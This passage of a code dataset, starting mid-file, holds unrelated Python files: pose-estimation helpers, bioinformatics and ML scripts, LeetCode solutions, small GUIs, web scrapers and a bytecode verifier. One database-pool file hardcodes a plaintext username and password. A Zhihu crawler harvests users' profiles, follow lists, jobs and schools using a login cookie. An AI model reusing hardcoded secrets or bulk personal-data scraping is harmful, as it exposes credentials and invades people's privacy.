= max(0, min(x, cfg.output_shape[1] - 1))\n\t\ty = max(0, min(y, cfg.output_shape[0] - 1))\n\t\tcls_skeleton[0, w, :2] = (x * 4 + 2, y * 4 + 2)\n\t\tcls_skeleton[0, w, 2] = r0[w, int(round(y) + 1e-10), int(round(x) + 1e-10)]\n\n\t# map back to original images\n\tcrops[0, :] = details[0, :]\n\tfor w in range(cfg.nr_skeleton):\n\t\tcls_skeleton[0, w, 0] = cls_skeleton[0, w, 0] / cfg.data_shape[1] * (\n\t\t\t\t\tcrops[0][2] - crops[0][0]) + crops[0][0]\n\t\tcls_skeleton[0, w, 1] = cls_skeleton[0, w, 1] / cfg.data_shape[0] * (\n\t\t\t\t\tcrops[0][3] - crops[0][1]) + crops[0][1]\n\n\t# flat is keypoints(17)\n\tfor w in range(cfg.nr_skeleton):\n\t\tflat[w*2] = cls_skeleton[0, w, 0]\n\t\tflat[w*2+1] = cls_skeleton[0, w, 1]\n\n\treturn flat\n\ndef upper_detection(frame, flat, person_dets):\n\n\t# upper detection & lower keypoint remove\n\tupper = False\n\n\t\"\"\"\n\tlower keypoint remove using keypoint of hip, knee\n\n\tl_hip_y , r_hip_y : flat[23], flat[25] or cls_skeleton[0, 11, 1], cls_skeleton[0, 12, 1]\n\tl_knee_y, r_knee_y : flat[27], flat[29] or cls_skeleton[0, 13, 1], cls_skeleton[0, 14, 1]\n\n\t\"\"\"\n\n\tl_hip_y = flat[23]\n\tr_hip_y = flat[25]\n\t\n\tl_knee_y = flat[27]\n\tr_knee_y = flat[29]\n\n\tbbox_y = person_dets[1] + person_dets[3]\n\n\n\t# remove based on hip keypoint\n\thip_distance_r = r_hip_y - bbox_y\n\thip_distance_l = l_hip_y - bbox_y\n\n\t# remove based on knee keypoint \n\tknee_distance_r = r_knee_y - bbox_y\n\tknee_distance_l = l_knee_y - bbox_y\n\n\t# remove based on bounding box (frame.shape[0] = 720)\n\tbox_distance = bbox_y - frame.shape[0]\n\n\t\n\thip_distance_r = abs(hip_distance_r)\n\thip_distance_l = abs(hip_distance_l)\n\tknee_distance_r = abs(knee_distance_r)\n\tknee_distance_l = abs(knee_distance_l)\n\tbox_distance = abs(box_distance)\n\n\n\tif ((hip_distance_r < 110 and hip_distance_l < 110 and box_distance < 30) or (knee_distance_r < 50 and knee_distance_l < 50 and box_distance < 30)):\n\t\tupper = True\n\t\t\n\t\t# remove lower (knee, ankle) keypoint\n\t\tfor i in range(26, 34):\n\t\t\tflat[i] = 0.0\n\n\treturn flat, upper\n\n\ndef draw_skeleton(aa, kp, upper=False):\n\n\t#upper = False\n\n\tshow_skeleton_labels = False\n\n\tkp = np.array(kp).astype(int)\n\tkp = kp.reshape(17, 2)\n\n\tkp_names = ['nose', 'l_eye', 'r_eye', 'l_ear', 'r_ear', 'l_shoulder', \n\t\t\t'r_shoulder', 'l_elbow', 'r_elbow', 'l_wrist', 'r_wrist', \n\t\t\t'l_hip', 'r_hip', 'l_knee', 'r_knee', 'l_ankle', 'r_ankle']\n\n\tskeleton = [[16, 14], [14, 12], [17, 15], [15, 13], [12, 13], [6, 12], [7, 13], [6, 7], [6, 8], [7, 9], [8, 10], [9, 11], [2, 3], [1, 2], [1, 3], [2, 4], [3, 5], [4, 6], [5, 7]]\n\n\t# 
remove lower (knee, ankle) \n\tif upper :\n\t\tskeleton = skeleton[4:]\t\n\t\tkp_names = kp_names[:13]\n\t\tkp = kp[:13]\n\n\tfor i, j in skeleton:\n\t\tif kp[i-1][0] >= 0 and kp[i-1][1] >= 0 and kp[j-1][0] >= 0 and kp[j-1][1] >= 0 and \\\n\t\t\t(len(kp[i-1]) <= 2 or (len(kp[i-1]) > 2 and kp[i-1][2] > 0.1 and kp[j-1][2] > 0.1)):\n\t\t\tcv2.line(aa, tuple(kp[i-1][:2]), tuple(kp[j-1][:2]), (0,255,255), 2)\n\tfor j in range(len(kp)):\n\t\tif kp[j][0] >= 0 and kp[j][1] >= 0:\n\n\t\t\tif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 1.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((0,0,255)), 2)\n\t\t\telif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((255,0,0)), 2)\n\n\t\t\tif show_skeleton_labels and (len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1)):\n\t\t\t\tcv2.putText(aa, kp_names[j], tuple(kp[j][:2]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0))\n\n\n\n","repo_name":"eehoeskrap/tensorrt_cpn","sub_path":"Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15769509798","text":"import random\nimport numpy as np\nimport sys\n# missing import, assumed from usage: motifs.parse(handle, \"jaspar\") below matches Biopython's Bio.motifs API\nfrom Bio import motifs\n\nf = open('perturbations.txt', 'w')\nwith open(\"pfm_all.txt\") as handle:\n for m in motifs.parse(handle, \"jaspar\"):\n counts = m.counts\n values = list()\n ncol = len(counts[1,:])\n for x in range(0,ncol): \n for y in range(0,4):\n values.append(counts[y,x])\n new_counts = np.reshape(np.matrix(values), (4,ncol), order=\"F\")\n for x in range(0,ncol):\n for y in range(0,20):\n a = random.randint(0,3)\n b = random.randint(0,3)\n old_a = new_counts[a,x]\n old_b = new_counts[b,x]\n new_counts[a,x] = old_b\n new_counts[b,x] = old_a\n f.write(\">%s %s\\n\"%(m.matrix_id,m.name))\n for x in range(0,4):\n for y in range(0, ncol):\n f.write(str(int(new_counts[x,y])))\n f.write(\"\\t\")\n f.write(\"\\n\")\n\nf.close() \n","repo_name":"ReddyLab/TransversionsInRegElements","sub_path":"Perturb_motif_rows.py","file_name":"Perturb_motif_rows.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"26860199731","text":"from DBUtils.PooledDB import PooledDB\nimport pymysql\nPOOL = PooledDB(\n creator=pymysql, # module that provides the DB connections\n maxconnections=6, # maximum connections the pool allows; 0 or None means unlimited\n mincached=2, # idle connections created at startup; 0 means none\n maxcached=5, # maximum idle connections kept in the pool; 0 or None means unlimited\n maxshared=3, # maximum number of shared connections\n blocking=True, # whether to block and wait when no connection is available; True waits, False raises an error\n maxusage=None, # maximum times a single connection is reused; None means unlimited\n setsession=[], # list of commands executed before each session\n ping=0, # check whether the server is reachable\n # pymysql connection settings\n host=\"127.0.0.1\",\n user=\"lance\",\n password=\"LANCEyuan88\",\n database=\"codepy\",\n charset=\"utf8\"\n)\n\n\nclass DataBase(object):\n def conn(self):\n conn = POOL.connection()\n # cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n cursor = conn.cursor()\n # cursor.execute(\"select * from app01_book\")\n return conn, cursor\n def get_one(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchone()\n cursor.close()\n conn.close()\n return data\n def get_all(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchall()\n cursor.close()\n conn.close()\n return 
data\n\n","repo_name":"LanceYuan/codepyFlask","sub_path":"DBpool.py","file_name":"DBpool.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28956565151","text":"from tkinter import ttk\nfrom tkinter import *\n\n# (\"I Curso\")\n# (\"II Semestre\")\n# (\"III Su Nobre Completo\")\n# (\"IV Su Número De Carné\")\nclass Desk:\n def __init__(self, window):\n \n anchura = 1000 \n altura = 800\n \n self.wind = window\n\n self.wind.geometry(str(anchura)+'x'+str(altura))\n \n self.wind.columnconfigure(0, weight=1)\n \n self.wind.title('Examen Final')\n\n frame = LabelFrame(self.wind, text = 'Calificacion')\n frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)\n \n Label(frame, text = 'Ingrese el primer numero: ').grid(row = 1, column = 0)\n \n self.var1 = Entry(frame)\n self.var1.focus()\n self.var1.grid(row = 1, column = 1)\n \n Label(frame, text = 'Ingrese el segundo numero: ').grid(row = 2, column = 0)\n self.var2 = Entry(frame)\n self.var2.grid(row = 2, column = 1)\n \n\n Label(frame, text = 'Ingrse el segundo numero: ').grid(row = 3, column = 0)\n self.var3 = Entry(frame)\n self.var3.grid(row = 3, column = 1)\n \n \n Button (frame, text = 'Iniciar', command = self.bottonR).grid(row = 6, columnspan = 5, sticky = W + E)\n Button (frame, text = 'Mostrar', command = self.bottonD).grid(row = 7, columnspan = 5, sticky = W + E)\n \n self.message = Label(text = '', fg = 'red')\n self.message.grid(row = 3, column = 0, columnspan = 2, sticky = W + E)\n\n \n def bottonR(self):\n a=float(self.var1.get())\n b=float(self.var2.get())\n c=float(self.var3.get())\n if (a 1\n# ⁠ B -> 2\n# ⁠ C -> 3\n# ⁠ ...\n# ⁠ Z -> 26\n# ⁠ AA -> 27\n# ⁠ AB -> 28\n# ⁠ ...\n#\n#\n# 示例 1:\n#\n# 输入: \"A\"\n# 输出: 1\n#\n#\n# 示例 2:\n#\n# 输入: \"AB\"\n# 输出: 28\n#\n#\n# 示例 3:\n#\n# 输入: \"ZY\"\n# 输出: 701\n#\n# 致谢:\n# 特别感谢 @ts 添加此问题并创建所有测试用例。\n#\n#\n\n\nclass Solution:\n def titleToNumber(self, s: str) -> int:\n res = 0\n for i in s:\n res = 26 * res + ord(i) - 64\n return res\n","repo_name":"ZodiacSyndicate/leet-code-solutions","sub_path":"easy/171.excel表列序号/171.excel表列序号.py","file_name":"171.excel表列序号.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"36"} +{"seq_id":"1161949159","text":"'''The program extracts values of student number and grade from\na .txt file (grades_program.txt) and creates a dictionary using these values'''\n\nimport tkinter.filedialog\n\ndef main():\n \n grade_file = open(tkinter.filedialog.askopenfilename())\n print (read_grades(grade_file))\n grade_file.close()\n \n \n\ndef read_grades(gradefile):\n\n \n ## skip over the header.\n line = gradefile.readline()\n while line != '\\n':\n line = gradefile.readline()\n \n\n ## Read the grades, accumulating them into a dict.\n grade_to_ids = {}\n line = gradefile.readline()\n\n while line != '':\n student_id = line[:4]\n grade = float(line[4:].strip())\n\n if grade not in grade_to_ids:\n grade_to_ids[grade] = [student_id]\n else:\n grade_to_ids[grade].append(student_id)\n \n line = gradefile.readline()\n\n return grade_to_ids\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewbells/python_learning","sub_path":"coursera/populate_dict.py","file_name":"populate_dict.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"74494640103","text":"# -*- coding: utf-8 
-*-\nimport requests\nfrom lxml import etree\nimport math\nimport json\nimport time\n\n\nclass Crawler(object):\n def get_page_html(self, url):\n \"\"\"\n 获取页面源码\n :param url:页面url\n :return: 页面源码\n \"\"\"\n if url:\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n '(KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36',\n 'cookie': 'cookie' # 这里填写你自己的登入的cookie\n }\n r = requests.get(url, headers=headers)\n print(\"正在获取{}的网页源码,状态码为{}\".format(url, r.status_code))\n # 爬取延时\n time.sleep(0.2)\n print(r.status_code)\n if r.status_code == 200:\n r.encoding = 'utf-8'\n return r.text\n return None\n\n def get_following_urls(self, userinfo_page_url, following_num):\n \"\"\"\n 根据用户主页拼接关注列表的url\n :param userinfo_page_url:\n :param following_num:\n :return:\n \"\"\"\n if not following_num:\n return None\n base_following_url = '/followees?include=data%5B*%5D.answer_count%2Carticles_count%2Cgender%2C' \\\n 'follower_count%2Cis_followed%2Cis_following%2Cbadge%5B%3F(type%3Dbest_answerer)%5' \\\n 'D.topics&offset={}&limit={}'\n page_nums = math.ceil(int(following_num.replace(',', '')) / 20)\n for i in range(int(page_nums)):\n following_url = userinfo_page_url.replace('people', 'api/v4/members') + base_following_url.format(i * 20, (\n i + 1) * 20)\n yield following_url\n\n def get_new_urls(self, following_json):\n \"\"\"\n 获取新的URL\n :param following_json:\n :return:\n \"\"\"\n if not following_json:\n return None\n # 解析返回的json数据\n base_url = 'https://www.zhihu.com'\n user_urls = []\n following_info_json = json.loads(following_json)\n items = following_info_json['data']\n for item in items:\n url_type = item['type']\n url_token = item['url_token']\n user_url = base_url + '/{}/{}'.format(url_type, url_token)\n print(\"爬取到新的用户链接:{}\".format(user_url))\n user_urls.append(user_url)\n return user_urls\n\n def get_userinfo(self, userinfo_url, user_page_html):\n \"\"\"\n 获取用户的详细信息\n :param userinfo_url:\n :param user_page_html:\n :return:\n \"\"\"\n if not user_page_html:\n return None\n print('正在爬取{}'.format(userinfo_url))\n user_page_html = etree.HTML(user_page_html)\n username = \"\".join(user_page_html.xpath('//span[@class=\"ProfileHeader-name\"]/text()'))\n follow_num = user_page_html.xpath(\n '//div[@class=\"NumberBoard FollowshipCard-counts NumberBoard--divider\"]//strong/text()')\n if not follow_num:\n return None\n following_num = follow_num[0]\n followers_num = follow_num[1]\n user_avatar_url = user_page_html.xpath('//img[@class=\"Avatar Avatar--large UserAvatar-inner\"]/@src')[0]\n userinfo_detail_items = user_page_html.xpath('//div[@class =\"ProfileHeader-infoItem\"]')\n if userinfo_detail_items:\n jobs = userinfo_detail_items[0].xpath('.//text()')\n if len(userinfo_detail_items) > 1:\n school = userinfo_detail_items[1].xpath('.//text()')\n else:\n school = []\n userinfo_detail = {\n 'jobs': jobs,\n 'school': school\n }\n else:\n userinfo_detail = []\n userinfo = {\n 'username': username,\n 'user_url': userinfo_url,\n 'following_num': following_num,\n 'followers_num': followers_num,\n 'user_avatar_url': user_avatar_url,\n 'userinfo_deail': userinfo_detail\n }\n print('爬取到用户信息:{}'.format(userinfo))\n return userinfo\n\n def main(self, userinfo_url):\n \"\"\"\n 主程序\n :param userinfo_url:\n :return:\n \"\"\"\n new_urls = []\n user_page_html = self.get_page_html(userinfo_url)\n if user_page_html:\n userinfo = self.get_userinfo(userinfo_url, user_page_html)\n if userinfo:\n following_urls = self.get_following_urls(userinfo_url, userinfo['following_num'])\n for 
following_url in following_urls:\n following_html = self.get_page_html(following_url)\n new_urls.extend(self.get_new_urls(following_html))\n return userinfo, new_urls\n return None, None\n\n\nif __name__ == '__main__':\n a = Crawler()\n a.main('https://www.zhihu.com/people/kmxz')\n","repo_name":"xieys/zhihu_spider","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"16009371781","text":"import re\nfrom utils.subprocess import get_output\n\n_command_candidate_patterns = ['clang(\\.exe)?$','clang-[A-Za-z0-9]*[0-9]+(\\.exe)?$', 'clang\\+\\+(\\.exe)?$', 'clang\\+\\+-[A-Za-z0-9]*[0-9]+(\\.exe)?$']\n_apple_llvm_pattern='Apple LLVM version ([0-9\\.]+)'\n_clangc2_pattern='clang with Microsoft CodeGen'\n_clang_version_pattern='clang version (\\d\\.\\d\\.\\d[^\\s]*)'\n\ndef _is_it_different_clang(output, patterns):\n for pattern in patterns:\n match = re.search(pattern, output)\n if match:\n return True\n return False\n\ndef _is_it_really_clang(command, patterns, out=None):\n for pattern in patterns:\n if re.search(pattern, command):\n output = get_output([command, \"--version\"])\n if not _is_it_different_clang(output, [_apple_llvm_pattern, _clangc2_pattern]):\n return True\n else:\n out.trace(\"[clng] {}: It is not vanilla Clang (e.g. Apple, or ClangC2). Aborting.\".format(command))\n return False\n\ndef _detect_clang_version(command, out=None):\n output = get_output([command, \"--version\"])\n match = re.search(_clang_version_pattern, output)\n if not match:\n out.warning(\"[clng] {}: could not find version string\".format(command))\n out.debug(\"[clng] {}: {}\".format(command, output))\n return \"unknown\"\n return match.group(1)\n\ndef _detect_clang(command, out=None):\n if not command:\n return None\n\n if not _is_it_really_clang(command, _command_candidate_patterns, out):\n if out:\n out.trace(\"[clng] {} is not Clang\".format(command))\n return None\n\n version=_detect_clang_version(command, out)\n out.info(\"[clng] {}: found Clang version {}\".format(command, version))\n\n options=[]\n meta = {\n \"tool\": \"clang\",\n \"path\": command,\n \"version\": version,\n \"options\": options\n }\n return meta\n\n\ndef run(command, out=None):\n ret = _detect_clang(command, out)\n if ret:\n return [ret]\n return None\n","repo_name":"unjello/findc","sub_path":"find_compiler/toolchain/matcher/clang/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"20550648548","text":"'''\nfit_transform(X):用X来训练PCA模型,同时返回降维后的数据。\ncomponents_不明白\n'''\nfrom numpy.random import RandomState\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_olivetti_faces\nfrom sklearn import decomposition\n\nn_row, n_col = 2, 3\nn_components = n_row * n_col\nimage_shape = (64, 64)\n\n###############################################################################\n# Load faces data\ndataset = fetch_olivetti_faces(shuffle=True, random_state=RandomState(0))\nfaces = dataset.data\n# (6,4096)\nprint(faces.shape)\n\n\n###############################################################################\ndef plot_gallery(title, images, n_col=n_col, n_row=n_row):\n # 子图 figsize(2*3,2.26*2) 生成图像的宽和长\n plt.figure(figsize=(2. 
* n_col, 2.26 * n_row))\n # 总图标题\n plt.suptitle(title, size=16)\n # 得到images 的序号和数据\n for i, comp in enumerate(images):\n # 第几个子图 subplot(2,3,1)\n plt.subplot(n_row, n_col, i + 1)\n vmax = max(comp.max(), -comp.min())\n # 显示子图,\n plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,\n interpolation='nearest', vmin=-vmax, vmax=vmax)\n # 将子图的横纵坐标去掉\n plt.xticks(())\n plt.yticks(())\n plt.subplots_adjust(0.01, 0.05, 0.99, 0.94, 0.04, 0.)\n\n\nplot_gallery(\"First centered Olivetti faces\", faces[:n_components])\n###############################################################################\n\nestimators = [\n ('Eigenfaces - PCA using randomized SVD',\n decomposition.PCA(n_components=6, whiten=True)),\n\n ('Non-negative components - NMF',\n decomposition.NMF(n_components=6, init='nndsvda', tol=5e-3))\n]\n\n###############################################################################\n\nfor name, estimator in estimators:\n print(\"Extracting the top %d %s...\" % (n_components, name))\n print(faces.shape)\n estimator.fit(faces)\n # 是W\n components_ = estimator.components_\n print('components_[:6].shape:')\n print(components_[:6].shape)\n # print(components_[:,n_components].shape)\n plot_gallery(name, components_[:n_components])\n\n# plt.show()\n","repo_name":"dpp1013/Sklearn_ML","sub_path":"NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"72170636585","text":"import requests\nfrom lxml import etree\nimport re\n\nurl = \"https://ssr1.scrape.center\"\nhtml = requests.get(url).text\n\n\nroot = etree.HTML(html)\n\nxpath = \"//img/@src\"\nimgs = root.xpath(xpath)\n\ni = 1\nfor imgPlace in imgs:\n if re.match(\"^h.*\", str(imgPlace)):\n print(imgPlace)\n response = requests.get(imgPlace)\n print(response.content)\n # 将图片内容保存到本地文件\n with open(\"../data/imgdata/SSR1_{}.jpg\".format(i), \"wb\") as f:\n f.write(response.content)\n print(\"图片已保存\")\n i += 1\n\n","repo_name":"cumin1/SpiderStudyCode","sub_path":"xpath_mate/SSR1.py","file_name":"SSR1.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"3458633407","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr( i + ord('a') )\n\n f = [[ 0 for j in range(2)] for i in range(len(s) + 1)]\n for i in range( 1, len(s) + 1 ):\n if i == 1:\n f[i][0] = 1 if s[i - 1] in dic else 0\n else:\n if s[i-1:i] in dic:\n f[i][0] = max(f[i-1][0], f[i-1][1])\n if s[i-2:i] in dic:\n f[i][1] = max(f[i-2][0], f[i-2][1])\n\n\n return f[-1]\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 1\n f = [0] * len(s)\n\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr(i + ord('a'))\n\n f = [0] * (len(s) + 1)\n f[0] = 1\n\n for i in range(1, len(s) + 1):\n f[i] = 0\n if ord('1') <= ord(s[i-1]) and ord(s[i-1]) <= ord('9'):\n f[i] += f[i - 1]\n\n if i > 1:\n j = 10 * ( ord(s[i-2]) - ord('0') ) + ord(s[i-1]) - ord('0')\n if 10 <= j and j <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n 转移方程:\n 对于一个digit满足1-9时,f[i] = f[i-1]\n 对于连续的两个字母满足10-24时, f[i] = f[i-1] + f[i-2]\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n\n f = [0] * (len(s) + 1)\n\n f[0] = 1 
#创建这个初始条件,主要是因为方便转移方程\n for i in range(1, len(s) + 1):\n temp = ord(s[i-1]) - ord('0')\n if temp > 0 and temp < 10:\n f[i] = f[i-1]\n if i > 1:\n temp = 10 * ( ord(s[i-2]) - ord('0') ) + ( ord(s[i-1]) - ord('0') )\n if 10 <= temp and temp <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\n\n\nif __name__ == '__main__':\n # s = \"12\"\n # s = \"226\"\n # s = \"0\"\n # s = \"012\"\n # s = \"1\"\n s = \"10\"\n\n\n print(Solution().numDecodings(s))\n","repo_name":"pi408637535/Algorithm","sub_path":"com/study/algorithm/daily/91. Decode Ways.py","file_name":"91. Decode Ways.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"3184471231","text":"# -*- coding: utf8 -*-\n\nfrom ..instructions import InsReturn, InsGoto, InsBranch\nfrom .. import opcodes\nfrom ..exceptions import VerifyException\nfrom .frame import Frame\nfrom .controlflow import ControlFlowAnalyzer\n\n\nclass Verifier():\n\n def __init__(self, interpreter):\n self.interpreter = interpreter\n self.changed = None\n self.frames = None\n self.queue = []\n self.method = None\n\n def verify(self, method):\n self.verify_jump_points(method)\n self.verify_load_store_vars(method)\n self.verify_return(method)\n self.verify_values(method)\n return True\n\n def verify_jump_points(self, method):\n for i, inst in enumerate(method.code):\n if inst.opcode == opcodes.GOTO or isinstance(inst, InsBranch):\n if inst.argument.value < 0 or inst.argument.value >= len(method.code):\n raise VerifyException('instruction %s jump target %s outside boundary <0, %s>' %\n (inst, inst.argument.value, len(method.code) - 1))\n return True\n\n def verify_load_store_vars(self, method):\n for inst in method.code:\n if inst.opcode in [opcodes.ISTORE, opcodes.FSTORE, opcodes.ASTORE]:\n pos = inst.argument.value\n lv = method.variables[pos]\n vt = self.interpreter.new_value(lv.vtype)\n self.interpreter.copy_operation(inst, vt)\n return True\n\n def verify_return(self, method):\n cfa = ControlFlowAnalyzer()\n bbs = cfa.analyze(method)\n for bb in bbs:\n end_ins = method.code[bb.end_inst_index]\n if not bb.sucessors and not isinstance(end_ins, InsReturn):\n raise VerifyException('leaf basic block does not end with return instruction, but wirh %s' % end_ins)\n return True\n\n def verify_values(self, method):\n self.method = method\n self.changed = [False for _ in method.code]\n self.frames = [None for _ in method.code]\n\n current = Frame()\n current.set_return(self.interpreter.new_value(method.return_type.vtype))\n\n for i, v in enumerate(method.variables):\n if i < method.argument_count:\n current.add_local(self.interpreter.new_value(v.vtype))\n else:\n current.add_local(self.interpreter.new_value(None))\n current.add_local_type(self.interpreter.new_value(v.vtype))\n\n self.merge(0, current)\n\n while self.queue:\n ins_int = self.queue.pop()\n ins = method.code[ins_int]\n frame = self.frames[ins_int]\n self.changed[ins_int] = False\n\n current = frame.copy()\n current.execute(ins, self.interpreter)\n if not isinstance(ins, InsReturn) and not isinstance(ins, InsGoto):\n self.merge(ins_int + 1, current)\n\n if isinstance(ins, InsGoto) or isinstance(ins, InsBranch):\n self.merge(ins.argument.value, current)\n\n return True\n\n def merge(self, i, frame):\n old_frame = self.frames[i]\n changes = False\n\n if old_frame is None:\n self.frames[i] = frame.copy()\n changes = True\n else:\n changes = old_frame.merge(frame, self.interpreter)\n\n if changes and not self.changed[i]:\n 
self.changed[i] = True\n self.queue.append(i)\n","repo_name":"lukleh/Tiny-Stackbased-Virtual-Machine-in-Python","sub_path":"TSBVMIP/analysis/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"26771792719","text":"import requests\nfrom fake_useragent import UserAgent\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\ndef link():\n url = 'https://kugoo-samokat.ru/elektrosamokat-kugoo-s3#!/tab/333312074-2'\n res = requests.get(url, headers={'User-Agent': UserAgent().chrome})\n html = res.content\n soup = BeautifulSoup(html, 'html.parser')\n name = soup.find('h1', attrs={'class': 'js-product-name'}).text\n\n d = {\n 'Категория': 'Электросамокаты',\n 'Цвет': 'черный',\n 'Бренд': 'Kugoo',\n 'Пол': '',\n 'Название': soup.find('h1', attrs={'class': 'js-product-name'}).text,\n 'Артикул товара': '0001',\n 'Баркод товара': '0001',\n 'Цена': soup.find('div', attrs={'class': 't762__price-value'}).text,\n 'Состав': '',\n 'Описание': '',\n 'Гарантийный срок': '1 год',\n 'Время зарядки': soup.find('div', attrs={'field': 'tn_text_1610137288297'}).text,\n 'Максимальная скорость': soup.find('div', attrs={'field': 'tn_text_1610130533629'}).text,\n 'Питание': 'от аккумулятора'\n }\n z = pd.DataFrame(d, index=[0])\n z.to_excel('name.xlsx')\n\n\nif __name__ == \"__main__\":\n link()\n","repo_name":"eugenerush/parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"358669428","text":"poke_names = {\n\n \"Bulbasaur\" : \"1.png\",\n \"Ivysaur\" : \"2.png\",\n \"Vensaur\" : \"3.png\",\n \"Charmander\": \"4.png\",\n \"Charmeleon\": \"5.png\",\n \"Charizard\" : \"6.png\",\n \"Squirtle\" : \"7.png\",\n \"Wartortle\" : \"8.png\",\n \"Blastoise\" : \"9.png\",\n \"Caterpie\" : \"10.png\",\n \"Metapod\" : \"11.png\",\n \"Butterfree\": \"12.png\",\n \"Weedle\" : \"13.png\",\n \"Kakuna\" : \"14.png\",\n \"Beedrill\" : \"15.png\",\n \"Pidgey\" : \"16.png\",\n \"Pidgeotto\" : \"17.png\",\n \"Pidgeot\" : \"18.png\",\n \"Rattata\" : \"19.png\",\n \"Raticate\" : \"20.png\",\n \"Spearow\" : \"21.png\",\n \"Fearow\" : \"22.png\",\n \"Ekans\" : \"23.png\",\n \"Arbok\" : \"24.png\",\n \"Pikachu\" : \"25.png\",\n \"Raichu\" : \"26.png\",\n \"Sandshrew\" : \"27.png\",\n \"Sandslash\" : \"28.png\",\n \"Nidoran F\" : \"29.png\",\n \"Nidorina\" : \"30.png\",\n \"Nidoqueen\" : \"31.png\",\n \"Nidoran M\" : \"32.png\",\n \"Nidorino\" : \"33.png\",\n \"Nidoking\" : \"34.png\",\n \"Clefairy\" : \"35.png\",\n \"Clefable\" : \"36.png\",\n \"Vulpix\" : \"37.png\",\n \"Ninetales\" : \"38.png\",\n \"Jigglypuff\": \"39.png\",\n \"Wigglytuff\": \"40.png\",\n \"Zubat\" : \"41.png\",\n \"Golbat\" : \"42.png\",\n \"Oddish\" : \"43.png\",\n \"Gloom\" : \"44.png\",\n \"Vileplume\" : \"45.png\",\n \"Paras\" : \"46.png\",\n \"Parasect\" : \"47.png\",\n \"Venonat\" : \"48.png\",\n \"Venomoth\" : \"49.png\",\n \"Diglett\" : \"50.png\",\n \"Dugtrio\" : \"51.png\",\n \"Meowth\" : \"52.png\",\n \"Persian\" : \"53.png\",\n \"Psyduck\" : \"54.png\",\n \"Golduck\" : \"55.png\",\n \"Mankey\" : \"56.png\",\n \"Primeape\" : \"57.png\",\n \"Growlithe\" : \"58.png\",\n \"Arcanine\" : \"59.png\",\n \"Poliwag\" : \"60.png\",\n \"Poliwhirl\" : \"61.png\",\n \"Poliwrath\" : \"62.png\",\n \"Abra\" : \"63.png\",\n \"Kadabra\" : \"64.png\",\n \"Alakazam\" : \"65.png\",\n \"Machop\" : 
